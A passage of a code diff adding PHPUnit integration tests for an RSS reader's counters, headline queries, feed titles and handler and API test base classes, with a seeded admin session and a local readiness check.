+    // ── Counters::get_all() ──
+
+    public function test_counters_get_all_returns_array(): void {
+        $result = Counters::get_all();
+
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_counters_get_all_contains_global_unread(): void {
+        $result = Counters::get_all();
+
+        $global = array_values(array_filter($result, fn ($entry) =>
+            $entry["id"] === "global-unread"
+        ));
+
+        $this->assertCount(1, $global);
+        $this->assertArrayHasKey("counter", $global[0]);
+        $this->assertIsInt($global[0]["counter"]);
+        $this->assertGreaterThanOrEqual(0, $global[0]["counter"]);
+    }
+
+    public function test_counters_get_all_contains_virtual_feeds(): void {
+        $result = Counters::get_all();
+
+        $virtual_ids = [Feeds::FEED_STARRED, Feeds::FEED_PUBLISHED, Feeds::FEED_FRESH, Feeds::FEED_ALL, Feeds::FEED_ARCHIVED];
+        $virtual_entries = array_values(array_filter($result, fn ($entry) =>
+            isset($entry["id"]) && in_array($entry["id"], $virtual_ids, true)
+        ));
+
+        $this->assertGreaterThanOrEqual(5, count($virtual_entries), "Should contain at least 5 virtual feed entries");
+
+        // Verify each expected virtual feed has required keys
+        foreach ($virtual_entries as $entry) {
+            $this->assertArrayHasKey("counter", $entry);
+        }
+    }
+
+    public function test_counters_get_all_contains_category_entries(): void {
+        $result = Counters::get_all();
+
+        $cat_entries = array_values(array_filter($result, fn ($entry) =>
+            isset($entry["kind"]) && $entry["kind"] === "cat"
+        ));
+
+        // Should have at least the Labels category + our 2 seed categories
+        $this->assertNotEmpty($cat_entries);
+    }
+
+    public function test_counters_get_all_contains_label_entries(): void {
+        $result = Counters::get_all();
+
+        // Label entries have negative ids (Labels::label_to_feed_id()) and a description key
+        $label_entries = array_values(array_filter($result, fn ($entry) =>
+            isset($entry["id"]) && $entry["id"] < 0 && isset($entry["description"])
+        ));
+
+        // Seed data has 2 labels (test-label-1, test-label-2)
+        $this->assertCount(2, $label_entries, "Should contain seed label entries");
+    }
+
+    // ── Counters::get_labels() ──
+
+    public function test_counters_get_labels_returns_array(): void {
+        $result = Counters::get_labels();
+
+        $this->assertNotEmpty($result);
+    }
+
+    public function test_counters_get_labels_with_ids(): void {
+        $pdo = Db::pdo();
+
+        // Get existing label ids from seed data
+        $label_ids = $pdo->query("SELECT id FROM ttrss_labels2 WHERE owner_uid = 1")->fetchAll(
+            PDO::FETCH_COLUMN
+        );
+
+        $this->assertNotEmpty($label_ids);
+
+        $result = Counters::get_labels($label_ids);
+
+        // Should return entries for the requested labels
+        $this->assertCount(count($label_ids), $result);
+
+        // Each entry should have expected keys
+        foreach ($result as $entry) {
+            $this->assertArrayHasKey("id", $entry);
+            $this->assertArrayHasKey("counter", $entry);
+            $this->assertArrayHasKey("auxcounter", $entry);
+            $this->assertArrayHasKey("description", $entry);
+        }
+    }
+
+    public function test_counters_get_labels_empty_array(): void {
+        $result = Counters::get_labels([]);
+
+        $this->assertEmpty($result);
+    }
+
+    public function test_counters_get_labels_nonexistent_ids(): void {
+        // Nonexistent label ids should return empty array
+        $result = Counters::get_labels([99999, 99998]);
+
+        $this->assertEmpty($result);
+    }
+
+    // ── Counters::get_conditional with label_ids ──
+
+    public function test_counters_get_conditional_with_label_ids(): void {
+        $pdo = Db::pdo();
+
+        // Get existing label ids
+        $label_ids = $pdo->query("SELECT id FROM ttrss_labels2 WHERE owner_uid = 1")->fetchAll(
+            PDO::FETCH_COLUMN
+        );
+
+        $this->assertNotEmpty($label_ids);
+
+        $result = Counters::get_conditional(null, $label_ids);
+
+        // Should contain label entries for the requested labels
+        $label_entries = array_values(array_filter($result, fn ($entry) =>
+            isset($entry["id"]) && $entry["id"] < 0 && isset($entry["description"])
+        ));
+
+        $this->assertCount(count($label_ids), $label_entries);
+    }
+
+    public function test_counters_get_conditional_with_both_feed_and_label_ids(): void {
+        $pdo = Db::pdo();
+
+        $feed_ids = [1, 2];
+        $label_ids = $pdo->query("SELECT id FROM ttrss_labels2 WHERE owner_uid = 1")->fetchAll(
+            PDO::FETCH_COLUMN
+        );
+
+        $result = Counters::get_conditional($feed_ids, $label_ids);
+
+        // Should contain both feed and label entries
+        // Note: may also include feed 0 (uncategorized) if any feeds lack a category
+        $feed_entries = array_filter($result, fn ($entry) =>
+            isset($entry["id"]) && is_int($entry["id"]) && $entry["id"] > 0
+        );
+        $label_entries = array_filter($result, fn ($entry) =>
+            isset($entry["id"]) && $entry["id"] < 0 && isset($entry["description"])
+        );
+
+        $this->assertGreaterThanOrEqual(2, count($feed_entries), "Should contain at least 2 requested feed entries");
+        $this->assertCount(count($label_ids), $label_entries, "Should contain label entries");
+    }
+}

--- a/tests_integration/FeedsHeadlinesIntegrationTest.php
+++ b/tests_integration/FeedsHeadlinesIntegrationTest.php
@@ -1,0 +1,426 @@
+<?php
+/** @group integration */
+final class FeedsHeadlinesIntegrationTest extends DbTestCase {
+    protected function setUp(): void {
+        parent::setUp();
+
+        // Ensure ALL articles are considered "fresh" regardless of when tests run.
+        // Default FRESH_ARTICLE_MAX_AGE is 24 hours; seed data articles may be old.
+        Prefs::set(Prefs::FRESH_ARTICLE_MAX_AGE, 999999, 1, null);
+    }
+
+    /**
+     * _get_headlines returns a 9-element array:
+     * [0] PDOResult — headline rows
+     * [1] string — feed title
+     * [2] string — feed site URL
+     * [3] string — last error
+     * [4] string — last updated
+     * [5] array — search words
+     * [6] int — always 1
+     * [7] bool — whether virtual feed
+     * [8] string — query error override (empty string on success)
+     */
+    public function test_get_headlines_return_structure(): void {
+        $params = [
+            "feed" => Feeds::FEED_ALL,
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title, $feed_site_url, $last_error, $last_updated,
+         $search_words, $flag, $is_vfeed, $query_error] = Feeds::_get_headlines($params);
+
+        $this->assertIsObject($res, "Element 0 should be a PDO result set");
+        $this->assertIsString($feed_title);
+        $this->assertIsString($feed_site_url);
+        $this->assertIsString($last_error);
+        $this->assertIsString($last_updated);
+        $this->assertIsArray($search_words);
+        $this->assertIsBool($is_vfeed);
+        $this->assertIsString($query_error);
+
+        // FEED_ALL is a virtual feed
+        $this->assertTrue($is_vfeed);
+        // No query error
+        $this->assertEmpty($query_error);
+    }
+
+    // ── Feed ID queries ──
+
+    public function test_get_headlines_by_feed_id(): void {
+        $params = [
+            "feed" => 1, // Hacker News
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertEquals("Hacker News", $feed_title);
+        $this->assertGreaterThanOrEqual(3, count($headlines), "Feed 1 should have at least 3 articles");
+
+        // All headlines should have required columns
+        foreach ($headlines as $hl) {
+            $this->assertArrayHasKey("id", $hl);
+            $this->assertArrayHasKey("title", $hl);
+            $this->assertArrayHasKey("guid", $hl);
+            $this->assertArrayHasKey("feed_id", $hl);
+            $this->assertArrayHasKey("unread", $hl);
+            $this->assertArrayHasKey("marked", $hl);
+        }
+    }
+
+    public function test_get_headlines_by_feed_id_empty(): void {
+        // Feed id 999 does not exist
+        $params = [
+            "feed" => 999,
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertEmpty($headlines);
+    }
+
+    public function test_get_headlines_by_feed_id_different_owner(): void {
+        // Feed 1 exists but owner_uid=2 has no subscriptions
+        $params = [
+            "feed" => 1,
+            "view_mode" => "all",
+            "owner_uid" => 2,
+        ];
+
+        [$res] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertEmpty($headlines, "Owner 2 should see no headlines for feed 1");
+    }
+
+    // ── Virtual feeds ──
+
+    public function test_get_headlines_feed_all(): void {
+        $params = [
+            "feed" => Feeds::FEED_ALL,
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title, , , , , , $is_vfeed] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertTrue($is_vfeed);
+        // FEED_ALL returns all articles for the owner
+        $this->assertGreaterThanOrEqual(11, count($headlines), "FEED_ALL should return all 11 seeded articles");
+    }
+
+    public function test_get_headlines_feed_starred(): void {
+        $params = [
+            "feed" => Feeds::FEED_STARRED,
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res, , , , , , , $is_vfeed] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertTrue($is_vfeed);
+        // seed.sql marks articles 3, 8, 11 as marked=true
+        $this->assertEquals(3, count($headlines), "Should return exactly 3 starred articles");
+
+        foreach ($headlines as $hl) {
+            $this->assertTrue($hl["marked"], "Each starred headline should be marked");
+        }
+    }
+
+    public function test_get_headlines_feed_fresh(): void {
+        // Fresh articles: unread, score >= 0, entered within FRESH_ARTICLE_MAX_AGE hours
+        // Default max_age is 24 hours. All seeded articles are within 24h of "now".
+        // Unread articles in seed: 1,2,4,5,6,7,9,10 = 8 articles
+        $params = [
+            "feed" => Feeds::FEED_FRESH,
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertGreaterThan(0, count($headlines), "Should return some fresh articles");
+
+        foreach ($headlines as $hl) {
+            $this->assertTrue($hl["unread"], "Each fresh headline should be unread");
+        }
+    }
+
+    public function test_get_headlines_feed_recently_read(): void {
+        // Articles 3, 8, 11 are marked=true in seed but have last_read=NULL.
+        // Use _catchup_by_id to set last_read = NOW() so they qualify as
+        // "recently read" (unread=false, last_read IS NOT NULL,
+        // last_read > NOW() - INTERVAL '1 day').
+        Article::_catchup_by_id([3, 8, 11], Article::CATCHUP_MODE_MARK_AS_READ, 1);
+
+        $params = [
+            "feed" => Feeds::FEED_RECENTLY_READ,
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title, , , , , , $is_vfeed] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        // Virtual feed
+        $this->assertTrue($is_vfeed);
+
+        // Feed title should be "Recently read"
+        $this->assertEquals("Recently read", $feed_title);
+
+        // Exactly 3 articles should appear — the ones we just caught up
+        $this->assertEquals(3, count($headlines));
+
+        // Verify the correct article IDs are present
+        $ids = array_column($headlines, "id");
+        $this->assertEquals([3, 8, 11], $ids);
+
+        // All should be read
+        foreach ($headlines as $hl) {
+            $this->assertFalse($hl["unread"], "Recently read articles should not be unread");
+        }
+    }
+
+    // ── View modes ──
+
+    public function test_get_headlines_view_mode_unread(): void {
+        $params = [
+            "feed" => 1, // Hacker News (has 3 articles: 2 unread, 1 read)
+            "view_mode" => "unread",
+            "owner_uid" => 1,
+        ];
+
+        [$res] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertEquals(2, count($headlines), "Feed 1 should have 2 unread articles");
+
+        foreach ($headlines as $hl) {
+            $this->assertTrue($hl["unread"], "Each headline should be unread");
+        }
+    }
+
+    public function test_get_headlines_view_mode_marked(): void {
+        $params = [
+            "feed" => Feeds::FEED_ALL,
+            "view_mode" => "marked",
+            "owner_uid" => 1,
+        ];
+
+        [$res] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        // seed.sql has 3 marked articles (ids 3, 8, 11)
+        $this->assertEquals(3, count($headlines), "Should return 3 marked articles");
+
+        foreach ($headlines as $hl) {
+            $this->assertTrue($hl["marked"], "Each headline should be marked");
+        }
+    }
+
+    public function test_get_headlines_view_mode_published(): void {
+        $params = [
+            "feed" => Feeds::FEED_ALL,
+            "view_mode" => "published",
+            "owner_uid" => 1,
+        ];
+
+        [$res] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        // None of the seeded articles are published
+        $this->assertEmpty($headlines, "No published articles in seed data");
+    }
+
+    // ── Pagination ──
+
+    public function test_get_headlines_limit(): void {
+        $params = [
+            "feed" => Feeds::FEED_ALL,
+            "view_mode" => "all",
+            "limit" => 5,
+            "owner_uid" => 1,
+        ];
+
+        [$res] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertEquals(5, count($headlines), "Limit of 5 should return exactly 5 headlines");
+    }
+
+    public function test_get_headlines_offset(): void {
+        // First call: limit=5, offset=0 (page 1)
+        $params = [
+            "feed" => Feeds::FEED_ALL,
+            "view_mode" => "all",
+            "limit" => 5,
+            "offset" => 0,
+            "owner_uid" => 1,
+        ];
+
+        [$res1] = Feeds::_get_headlines($params);
+        $headlines_page1 = $res1->fetchAll(PDO::FETCH_ASSOC);
+
+        // Second call: limit=5, offset=5 (page 2) — must use same limit to share matview
+        $params["offset"] = 5;
+        [$res2] = Feeds::_get_headlines($params);
+        $headlines_page2 = $res2->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertCount(5, $headlines_page1);
+        $this->assertCount(5, $headlines_page2);
+
+        // Page 1 and page 2 should not overlap
+        $page1_ids = array_column($headlines_page1, "id");
+        $page2_ids = array_column($headlines_page2, "id");
+        $overlap = array_intersect($page1_ids, $page2_ids);
+        $this->assertEmpty($overlap, "Page 1 and page 2 should not overlap");
+
+        // Together they should be 10 distinct articles
+        $all_ids = array_merge($page1_ids, $page2_ids);
+        $this->assertCount(10, array_unique($all_ids));
+    }
+
+    // ── Since ID ──
+
+    public function test_get_headlines_since_id(): void {
+        $params = [
+            "feed" => Feeds::FEED_ALL,
+            "view_mode" => "all",
+            "since_id" => 5,
+            "owner_uid" => 1,
+        ];
+
+        [$res] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        // Should only return articles with id > 5
+        $ids = array_column($headlines, "id");
+        foreach ($ids as $id) {
+            $this->assertGreaterThan(5, $id, "All returned articles should have id > 5");
+        }
+    }
+
+    // ── Category view ──
+
+    public function test_get_headlines_cat_view(): void {
+        // Category 1 = "Technology" (feeds 1, 2, 3)
+        $params = [
+            "feed" => 1, // category id
+            "view_mode" => "all",
+            "cat_view" => true,
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertEquals("Technology", $feed_title);
+        // Category 1 has 3 feeds with 3+3+2 = 8 articles
+        $this->assertEquals(8, count($headlines), "Category Technology should have 8 articles");
+    }
+
+    public function test_get_headlines_cat_view_uncategorized(): void {
+        $params = [
+            "feed" => Feeds::CATEGORY_UNCATEGORIZED,
+            "view_mode" => "all",
+            "cat_view" => true,
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertEquals("Uncategorized", $feed_title);
+        // All seeded feeds have a category, so uncategorized should be empty
+        $this->assertEmpty($headlines);
+    }
+
+    // ── Metadata ──
+
+    public function test_get_headlines_metadata_feed(): void {
+        $params = [
+            "feed" => 1,
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title, $feed_site_url, $last_error, $last_updated] = Feeds::_get_headlines($params);
+
+        $this->assertEquals("Hacker News", $feed_title);
+        $this->assertEquals("https://news.ycombinator.com", $feed_site_url);
+        $this->assertEmpty($last_error);
+    }
+
+    public function test_get_headlines_metadata_category(): void {
+        $params = [
+            "feed" => 1,
+            "view_mode" => "all",
+            "cat_view" => true,
+            "owner_uid" => 1,
+        ];
+
+        [$res, $feed_title] = Feeds::_get_headlines($params);
+
+        $this->assertEquals("Technology", $feed_title);
+    }
+
+    // ── Headline columns ──
+
+    public function test_get_headlines_columns(): void {
+        $params = [
+            "feed" => 1,
+            "view_mode" => "all",
+            "owner_uid" => 1,
+        ];
+
+        [$res] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertNotEmpty($headlines);
+
+        $expected_columns = [
+            "id", "date_entered", "guid", "title", "updated",
+            "label_cache", "tag_cache", "always_display_enclosures",
+            "site_url", "note", "num_comments", "comments",
+            "int_id", "uuid", "lang", "hide_images",
+            "unread", "feed_id", "marked", "published", "link",
+            "last_read", "last_marked", "last_published",
+            "content", "author", "score",
+            "num_labels", "num_enclosures",
+        ];
+
+        foreach ($headlines as $hl) {
+            foreach ($expected_columns as $col) {
+                $this->assertArrayHasKey($col, $hl, "Missing column: $col");
+            }
+        }
+    }
+
+    // ── Feed with no articles for owner ──
+
+    public function test_get_headlines_feed_not_subscribed(): void {
+        // Feed 1 exists in the DB but owner_uid=2 has no ttrss_user_entries for it
+        $params = [
+            "feed" => 1,
+            "view_mode" => "all",
+            "owner_uid" => 2,
+        ];
+
+        [$res, $feed_title] = Feeds::_get_headlines($params);
+        $headlines = $res->fetchAll(PDO::FETCH_ASSOC);
+
+        $this->assertEmpty($headlines);
+        // Feed doesn't exist for owner_uid=2, so _get_title returns "Unknown feed"
+        $this->assertEquals("Unknown feed (1)", $feed_title);
+    }
+}

--- a/tests_integration/FeedsIntegrationTest.php
+++ b/tests_integration/FeedsIntegrationTest.php
@@ -1,0 +1,119 @@
+<?php
+/** @group integration */
+final class FeedsIntegrationTest extends DbTestCase {
+
+    // ── Special feeds (hardcoded titles, no DB needed for the lookup) ──
+
+    public function test_get_title_special_feeds(): void {
+        $this->assertEquals(
+            __("Starred articles"),
+            Feeds::_get_title(Feeds::FEED_STARRED, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("Published articles"),
+            Feeds::_get_title(Feeds::FEED_PUBLISHED, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("Fresh articles"),
+            Feeds::_get_title(Feeds::FEED_FRESH, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("All articles"),
+            Feeds::_get_title(Feeds::FEED_ALL, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("Archived articles"),
+            Feeds::_get_title(Feeds::FEED_ARCHIVED, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("Recently read"),
+            Feeds::_get_title(Feeds::FEED_RECENTLY_READ, $_SESSION['uid'])
+        );
+    }
+
+    public function test_get_title_error_feed(): void {
+        // FEED_ERROR (-7) is < 0 and >= LABEL_BASE_INDEX, falls to else branch
+        $this->assertEquals("-7", Feeds::_get_title(Feeds::FEED_ERROR, $_SESSION['uid']));
+    }
+
+    public function test_get_title_non_numeric_id(): void {
+        $this->assertEquals("random-id", Feeds::_get_title("random-id", $_SESSION['uid']));
+    }
+
+    // ── Numeric feed IDs (requires DB lookup in ttrss_feeds) ──
+
+    public function test_get_title_numeric_feed_id_existing(): void {
+        // seed.sql inserts feeds with ids 1-4
+        $this->assertEquals("Hacker News", Feeds::_get_title(1, $_SESSION['uid']));
+        $this->assertEquals("The Register", Feeds::_get_title(2, $_SESSION['uid']));
+        $this->assertEquals("Ars Technica", Feeds::_get_title(3, $_SESSION['uid']));
+        $this->assertEquals("MIT Tech Review", Feeds::_get_title(4, $_SESSION['uid']));
+    }
+
+    public function test_get_title_numeric_feed_id_missing(): void {
+        // Feed id 999 does not exist in seed.sql
+        $this->assertEquals("Unknown feed (999)", Feeds::_get_title(999, $_SESSION['uid']));
+    }
+
+
+
+    // ── Label IDs (requires DB lookup in ttrss_labels2) ──
+
+    public function test_get_title_label_id_existing(): void {
+        // Label reference IDs must be < LABEL_BASE_INDEX (-1024).
+        // Labels::label_to_feed_id() converts a positive DB label id to
+        // the negative reference used by _get_title().
+        $ref_id_1 = Labels::label_to_feed_id(1);
+        $this->assertEquals("test-label-1", Feeds::_get_title($ref_id_1, $_SESSION['uid']));
+
+        $ref_id_2 = Labels::label_to_feed_id(2);
+        $this->assertEquals("test-label-2", Feeds::_get_title($ref_id_2, $_SESSION['uid']));
+    }
+
+    public function test_get_title_label_id_missing(): void {
+        // Label id 9999 does not exist; its reference is < LABEL_BASE_INDEX
+        $ref_id = Labels::label_to_feed_id(9999);
+        $this->assertEquals("Unknown label (9999)", Feeds::_get_title($ref_id, $_SESSION['uid']));
+    }
+
+    // ── Category IDs (cat=true, requires DB lookup in ttrss_feed_categories) ──
+
+    public function test_get_title_category_special(): void {
+        $this->assertEquals(
+            __("Special"),
+            Feeds::_get_title(Feeds::CATEGORY_SPECIAL, 1, true)
+        );
+    }
+
+    public function test_get_title_category_uncategorized(): void {
+        $this->assertEquals(
+            __("Uncategorized"),
+            Feeds::_get_title(Feeds::CATEGORY_UNCATEGORIZED, 1, true)
+        );
+    }
+
+    public function test_get_title_category_labels(): void {
+        $this->assertEquals(
+            __("Labels"),
+            Feeds::_get_title(Feeds::CATEGORY_LABELS, 1, true)
+        );
+    }
+
+    public function test_get_title_category_existing(): void {
+        // seed.sql inserts categories with ids 1 and 2
+        $this->assertEquals("Technology", Feeds::_get_title(1, $_SESSION['uid'], 1, true));
+        $this->assertEquals("Science & Nature", Feeds::_get_title(2, $_SESSION['uid'], 1, true));
+    }
+
+    public function test_get_title_category_missing(): void {
+        // Category id 999 does not exist in seed.sql
+        $this->assertEquals("UNKNOWN", Feeds::_get_title(999, $_SESSION['uid'], 1, true));
+    }
+
+    // ── Owner UID parameter ──
+
+    public function test_get_title_different_owner_uid(): void {
+        // seed data is for uid=1; uid=2 has no feeds
+        $this->assertEquals("UNKNOWN", Feeds::_get_title(1, 2, 1));
+    }
+}

--- a/tests_integration/HandlerTestCase.php
+++ b/tests_integration/HandlerTestCase.php
@@ -1,0 +1,219 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Base class for integration tests that invoke backend Handler classes
+ * through Router_Backend (the same path used by backend.php).
+ *
+ * Provides shared infrastructure: database seeding, session setup, and an
+ * `invokeHandler()` method that dispatches requests through the router,
+ * captures the output, and returns the parsed JSON response.
+ *
+ * Usage:
+ *   class FeedsHandlerTest extends HandlerTestCase {
+ *       public function test_get_unread(): void {
+ *           $resp = $this->invokeHandler('Feeds', 'getUnread');
+ *           $this->assertResponseOk($resp);
+ *           $this->assertResponseHasKey($resp, 'unread');
+ *       }
+ *   }
+ */
+abstract class HandlerTestCase extends DbTestCase {
+
+    protected string $csrfToken = '';
+
+    /**
+     * Ensure multi-user mode so that session validation is exercised.
+     * Single-user mode bypasses session checks entirely.
+     */
+    protected function setUp(): void {
+        parent::setUp();
+
+        Config::set(Config::SINGLE_USER_MODE, 'false');
+
+        // Set up a valid admin session (uid=1, pwd_hash = SHA1('password')).
+        // This is the default admin user created by the schema.
+        $this->setAdminSession();
+    }
+
+    /**
+     * Set up the session as the admin user (uid=1).
+     *
+     * The admin user's pwd_hash is SHA1('password') = 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8.
+     */
+    protected function setAdminSession(): void {
+        $_SESSION['uid'] = 1;
+        $_SESSION['pwd_hash'] = 'SHA1:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8';
+        $_SESSION['name'] = 'admin';
+        $_SESSION['access_level'] = UserHelper::ACCESS_LEVEL_ADMIN;
+    }
+
+    /**
+     * Clear the session (guest state).
+     */
+    protected function setGuestSession(): void {
+        unset($_SESSION['uid']);
+        unset($_SESSION['pwd_hash']);
+        unset($_SESSION['name']);
+        unset($_SESSION['access_level']);
+    }
+
+    /**
+     * Generate a CSRF token and store it in the session.
+     *
+     * @return string The generated token.
+     */
+    protected function generateCsrfToken(): string {
+        if (session_status() !== PHP_SESSION_ACTIVE) {
+            session_start();
+        }
+
+        $this->csrfToken = bin2hex(random_bytes(32));
+        $_SESSION['csrf_token'] = $this->csrfToken;
+
+        return $this->csrfToken;
+    }
+
+    /**
+     * Invoke a handler method through Router_Backend and capture the response.
+     *
+     * This simulates the request flow: backend.php → Router_Backend::handle_request()
+     * → handler instantiation → method call → response output.
+     *
+     * @param string $handlerClass Handler class name (e.g., 'Feeds', 'RPC')
+     * @param string $method       Method name to call (e.g., 'getUnread', 'markArticleRead')
+     * @param array<int|string, mixed> $params Request parameters (corresponds to $_REQUEST)
+     * @return array{response: array<int|string, mixed>|null, body: string}
+     *         - response: decoded JSON body, or null if not JSON
+     *         - body: raw output body string
+     */
+    protected function invokeHandler(
+        string $handlerClass,
+        string $method,
+        array $params = []
+    ): array {
+        // Prepare the request array (mirrors $_REQUEST in backend.php)
+        $request = array_merge([
+            'op'         => $handlerClass,
+            'method'     => $method,
+            'subop'      => null,
+            'csrf_token' => $this->csrfToken,
+        ], $params);
+
+		// some handler methods invoke $_REQUEST directly
+		$_REQUEST = array_merge($_REQUEST, $request);
+
+        // Capture output from the handler's Response::send() calls.
+        // The router calls Response::json()->send() which echoes JSON.
+        ob_start();
+
+        // Invoke the Handler
+        $router = new $handlerClass($request);
+        $router->$method();
+
+        $rawBody = ob_get_clean();
+
+        // Parse the JSON response
+        $response = null;
+        if ($rawBody !== '') {
+            $decoded = json_decode($rawBody, true);
+            if (is_array($decoded)) {
+                $response = $decoded;
+            }
+        }
+
+        return [
+            'response' => $response,
+            'body'     => $rawBody,
+        ];
+    }
+
+    /**
+     * Assert that the response has a valid content block without errors.
+     *
+     * Handles both wrapped API responses {seq, status, content} and
+     * flat responses {error, ...}.
+     *
+     * @param array<int|string, mixed> $resp
+     */
+    protected function assertResponseOk(array $resp): void {
+        // Check for flat error format
+        if (isset($resp['error'])) {
+            $this->fail(
+                "Response contains error: " . json_encode($resp['error'])
+            );
+        }
+
+        // Check for wrapped API format
+        if (isset($resp['content'])) {
+            $this->assertArrayNotHasKey(
+                'error',
+                $resp['content'],
+                $resp['content']['error'] ?? ''
+            );
+        }
+    }
+
+    /**
+     * Assert that the response has an error.
+     *
+     * @param array<int|string, mixed> $resp
+     * @param string|null $expectedCode Expected error code (optional)
+     */
+    protected function assertResponseError(
+        array $resp,
+        ?string $expectedCode = null
+    ): void {
+        if (isset($resp['error'])) {
+            if ($expectedCode) {
+                $this->assertEquals(
+                    $expectedCode,
+                    $resp['error']['code'] ?? null,
+                    "Expected error code '$expectedCode'"
+                );
+            }
+        } elseif (isset($resp['content']['error'])) {
+            if ($expectedCode) {
+                $this->assertEquals(
+                    $expectedCode,
+                    $resp['content']['error']['code'] ?? null,
+                    "Expected error code '$expectedCode'"
+                );
+            }
+        } else {
+            $this->fail(
+                "Expected error in response, got: " . json_encode($resp)
+            );
+        }
+    }
+
+    /**
+     * Extract a value from the response content.
+     *
+     * Handles both wrapped {content: {...}} and flat response formats.
+     *
+     * @param array<int|string, mixed> $resp
+     * @param string $key Key to extract
+     * @return mixed
+     */
+    protected function getResponseContent(array $resp, string $key): mixed {
+        $content = $resp['content'] ?? $resp;
+
+        return $content[$key] ?? null;
+    }
+
+    /**
+     * Assert that the response contains a specific key in its content.
+     *
+     * @param array<int|string, mixed> $resp
+     * @param string $key
+     */
+    protected function assertResponseHasKey(array $resp, string $key): void {
+        $content = $resp['content'] ?? $resp;
+        $this->assertArrayHasKey(
+            $key,
+            $content,
+            "Response should contain key '$key'. Got: " . json_encode($content)
+        );
+    }
+}

--- a/tests_integration/IntegrationTestCase.php
+++ b/tests_integration/IntegrationTestCase.php
@@ -1,0 +1,171 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Base class for API-based integration tests.
+ *
+ * Provides shared infrastructure: API URL configuration, HTTP request helper,
+ * login/authentication, and common response assertions.
+ */
+abstract class IntegrationTestCase extends TestCase {
+    protected string $api_url = "";
+    protected string $app_url = "";
+    protected string $sid = "";
+    protected ?string $seedSqlPath = null;
+
+    public function __construct(?string $name = null) {
+        $this->api_url = getenv('API_URL');
+        $this->app_url = getenv('APP_URL');
+
+        $this->setUp();
+        $this->login();
+
+        parent::__construct($name);
+    }
+
+    /**
+     * Reset the database to a clean state and re-seed with synthetic test data.
+     * Called before each test method to ensure test isolation.
+     *
+     * Before seeding, checks that the PHP dev server is ready and not processing
+     * lingering requests from previous tests. This prevents deadlocks caused by
+     * the test process and PHP dev server accessing the same tables concurrently.
+     */
+    protected function setUp() : void {
+        $this->waitForApiReady();
+        $this->seedDatabase();
+    }
+
+    /**
+     * Poll the API until it responds successfully, ensuring the PHP dev server
+     * is ready before we start database operations.
+     *
+     * This prevents deadlocks where the test process holds DB locks while the
+     * PHP dev server is still processing a request from a previous test.
+     */
+    protected function waitForApiReady() : void {
+        if (empty($this->api_url)) {
+            return;
+        }
+
+        $maxAttempts = 30;
+        for ($i = 0; $i < $maxAttempts; $i++) {
+            $ch = curl_init($this->api_url);
+            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+            curl_setopt($ch, CURLOPT_POST, true);
+            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["op" => "getVersion"]));
+            curl_setopt($ch, CURLOPT_TIMEOUT_MS, 500);
+            $resp = curl_exec($ch);
+            $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
+            curl_close($ch);
+
+            if ($status === 200) {
+                return;
+            }
+
+            usleep(100000); // 100ms
+        }
+
+        $this->fail("PHP dev server did not become ready within " . ($maxAttempts * 100) . "ms");
+    }
+
+    /**
+     * Execute seed.sql to re-populate the database with synthetic test data.
+     *
+     * Wrapped in a transaction to ensure atomicity and minimize lock duration.
+     * The seed.sql uses TRUNCATE (not DELETE) for faster, shorter-lived locks.
+     */
+    protected function seedDatabase() : void {
+        $seedPath = $this->seedSqlPath ?? __DIR__ . "/seed.sql";
+
+        if (!file_exists($seedPath)) {
+            $this->fail("Seed file not found: $seedPath");
+        }
+
+        $seedSql = file_get_contents($seedPath);
+
+        if ($seedSql === false) {
+            $this->fail("Could not read seed file: $seedPath");
+        }
